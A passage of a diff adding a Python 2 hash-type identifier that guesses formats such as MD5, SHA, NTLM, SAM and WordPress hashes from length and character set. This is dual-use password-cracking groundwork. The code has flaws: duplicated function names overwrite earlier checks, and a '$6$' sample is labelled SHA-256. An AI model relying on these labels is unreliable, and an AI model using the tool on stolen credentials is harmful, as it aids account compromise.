"106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); 